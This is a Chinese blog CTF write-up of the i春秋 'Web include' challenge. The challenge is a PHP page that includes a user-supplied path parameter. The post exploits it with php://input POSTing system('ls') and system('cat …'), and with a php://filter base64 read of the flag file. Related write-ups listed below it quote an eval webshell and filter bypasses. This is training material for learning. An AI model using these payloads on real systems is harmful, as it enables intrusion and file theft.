i春秋CTF训练 Web include

最新推荐文章于 2024-07-02 10:35:58 发布

椰奶冻不安全

最新推荐文章于 2024-07-02 10:35:58 发布

阅读量1.2k

点赞数

分类专栏： CTF 文章标签： php python web

来自椰奶冻不安全的博客，复制完可要记得我吖

本文链接：https://blog.csdn.net/qq_40654505/article/details/107046444

版权

CTF 专栏收录该内容

14 篇文章 1 订阅

订阅专栏

Web include

题目内容：没错！就是文件包含漏洞。

链接需到ichunqiu网站申请

页面显示出了phpinfo.php的信息以及php源码

<?php 
show_source(__FILE__);
if(isset($_REQUEST['path'])){
    include($_REQUEST['path']);
}else{
    include('phpinfo.php');
}

发现可以直接对path进行利用，构造path=php://input，同时post : <?php echo system('ls');?>

http://xxx.changame.ichunqiu.com/?path=php://input

<?php echo system('ls');?>

在这里插入图片描述

将post的内容改为

<?php echo system('cat dle345aae.php');?>

就能在源码中看到flag

在这里插入图片描述

也可以通过

http://caa2027b0a324688900cbe809b1ab644d9619be7224b4987.changame.ichunqiu.com/?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

在这里插入图片描述
base64解密即可得到答案

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

椰奶冻不安全

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

ctf (NiZhuanSiWei)

Glacier_Mount的博客

06-27

378

这是一道简单的web题涉及data://伪协议、php伪协议和反序列化的简单应用。

i春秋ctf夺旗赛（第四季）writeup——web

jammny

01-06

1868

前言：这次的比赛一共有六道web题，接下我会详细介绍解题的步骤以及思路，以便让小白和没有接触过这类题型的小伙伴们能读懂。第一题，nani 1、打开网页啥都没有，内容一片空白啥。这时候我们应该按F12去查看网页源码。往往很多提示和关键性信息都藏在这里。如图所示： 2、得到提示：./index.php?file=show.php ；看到关键字file，下意识想会不会存在文件包含呢？不急，我们先去访...

参与评论您还未登录，请先登录后发表或查看评论

CTF-include

qq_61774705的博客

08-16

2015

ctf

从零开始学习CTF——CTF是什么

最新发布

jasonOI的博客

07-02

976

一般大型比赛大都是i春秋承办的，以小组的形式比赛，分预选赛和总决赛。预选赛都是线上比赛，比赛形式几乎都是解题模式。进入官方提供的网站，登录账号密码后会到一个页面，题目按类别分类（后续会讲有什么类别），点击后提供题目链接、题目信息、题目提示和flag（答案）提交，提交后会得到分数。其中，一血、二血、三血拿的分数比较高，后面答该题的队伍拿的分数就一样了，答题的队伍越少，分数就越多，然后按分数排名，确定进入决赛的队伍。

CTF-web(web_php_include)

分享与记录

05-21

1832

1.题目信息 2.代码理解 3.抓包因为strstr()函数对大小写敏感，所以只需PHP://即可绕过将post请求的数据当作php代码执行，得到当前目录下的文件很明显flag在fl4gisisish3r3.php中，于是更改提交的php代码，得到flag ...

ctf include(文件包含漏洞)

weixin_64311421的博客

03-01

1211

不能不知道ctf比赛中的文件包含漏洞的题

ctf文件包含

qq_52671379的博客

06-14

635

ctf文件包含题目鼓捣一下发现一个链接shell 意思是可通过ctfhub传值看一下代码发现看到eval函数，将请求的参数作为命令执行。可是txt文件是无法利用的，所以想到刚才的index页面中，有一个include函数通过get提交，会将shell.txt的内容合并到index.php中，尝试post提交ctfhub的值，发现被执行了，然后输出了当下目录的文件。 Flag在文件file通过get传值会被include函数将文件的内容合并到index.php中首先将文件给到shell.tet

i春秋 web“百度杯”CTF比赛九月场-Upload & code

ChanCherry的博客

10-13

1004

“百度杯”CTF比赛九月场Upload 可以上传文件，并且上传之后可以点击源码链接打开文件，上传了这几句话： <?php @eval($POST["code"]); ?> 结果发现<?php被过滤了，于是用php脚本标记来绕过过滤： <script language="PHP"> $fh=fopen("../flag.".strtolower("PHP"),'r...

i春秋百度杯”CTF比赛（二月场） Misc&&web题解 By Assassin

热门推荐

Assassin

03-16

2万+

学习web，搞起来！百度杯”CTF比赛（二月场）训练赛传送门爆破-1打开题目我们直接就看到源码，加上注释如下<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则

CTF web学习笔记

daqiangdetianxia的博客

06-30

1775

web狗生存之道讲师:y4ngshu 日常渗透测试（笔记） 1.信息收集 2.登陆后台----->getshell 3.Getshell失败----->转换思路------>挖掘其它漏洞(sql注入等)------>列库收集用户信息 4.拿到用户密码------>撞邮箱-------->邮箱拿到关键信息----------->拿到vpn 5.通过vpn去访问文件服务器------->写脚本getshell CTF学习 1.xss打后台-----&gt.

i春秋 “百度杯”CTF比赛十月场 Backdoor

include_heqile的博客

09-20

2901

https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;r=0 这道题应该是我目前遇到的最有难度的一道题了，不过解题过程很有意思首先还是进入题目链接，根据题目提示去查看网站目录下的敏感文件，我尝试了flag.php，但并未得到有价值的提示，然后我们再尝试一下敏感目录，当我在Challenges下输入.git的时候，出现了403 Forbidden错误，说明网站中存在...

[CTF][ACTF2020新生赛]include

凉水的博客

10-18

2846

解题思路 1 尝试随便试了下几种目录穿越的方法，没有错误回显，没法判断是否成功。 …/…/ 以及file=xx.php等 2 换思路简单试过后，发觉即使是目录攻击，这种无有效提示的攻击尝试方法，也是非常低效的。应该换个其它思路试一下。翻出ctfer成长之路，这本书，看到php的漏洞利用，有filter以及zip协议等，灵机一动，考虑到php内容本身没有回显，会不会在php代码注释里，不管，先用filter试一下base64编码，试了一下，得到： ?file=php://filter/convert.b

BUUCTF web之Include

内心不种满鲜花就会长满杂草

11-20

973

题目提示Include，那考察的应该是文件包含漏洞访问如下点击tips，提示“can you find out the flag?”，观察url为"?file=flag.php"可知为文件包含的形式。

Buuctf-Web-[ACTF2020 新生赛]Include

御七彩虹猫

05-13

505

Buuctf-Web-[ACTF2020 新生赛]Include

ctf

handuoduo123的博客

11-02

751

ctf 啾咪打开是一可爱的小猫咪图片后缀为png,推测与LSB相关，用Stegsolve打开,按左右键调三原色。 ![一般情况下，将三原色都调成0，BGR排序往上拉，可以看到一段码] 将得到的码，在base64下解码 ...

CTF——Web——文件包含漏洞

小锤队长的博客

08-19

1万+

转载于信安之路：https://cloud.tencent.com/developer/article/1180857 文件包含原理：原理文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数： 1、include() 当...

CTF笔记

Bnessy

03-20

592

信息收集源代码响应包 robots协议 phps文件泄露 www.zip代码泄露 git代码泄露 svn泄露 vim缓存，第一次 .swp，第二次 .swo，第三次 .swn cookie dns TXT记录环境默认账号密码 PHP探针 mdb文件（ /db/db.mdb ）数据库备份（ backup.sql ）爆破弱口令子域名目录/文件命令执行关键字绕过通配符 ? 如：fla??? 如：fla* 单双引号 ‘’ 如：fla’'g.php “” 如.

“百度杯”CTF比赛 2017 二月场 include

SPS98

11-05

607

题目说的很明确, 直接告诉说是文件包含漏洞, 看了下分值感觉应该没有什么套路

“百度杯”CTF比赛 2017 二月场---------------include

大方子

09-04

1359

================================ 个人收获： 1.网页的输出不一定会出现在页面上，也可能在页面源码里面 2.当php开启allow_url_include的时候，可以用php://input伪协议包含文件 3. php://filter/read=convert.base64-encode/resource=［文件路径］函数读取文件内容 4.php...

ctf题目Web_php_include

07-28

- *1* [ctf-攻防世界-web：Web_php_include](https://blog.csdn.net/m0_62619559/article/details/121345424)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt...